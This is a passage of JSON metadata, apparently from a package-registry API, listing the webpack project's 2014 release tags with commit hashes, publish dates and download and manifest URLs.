sitories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.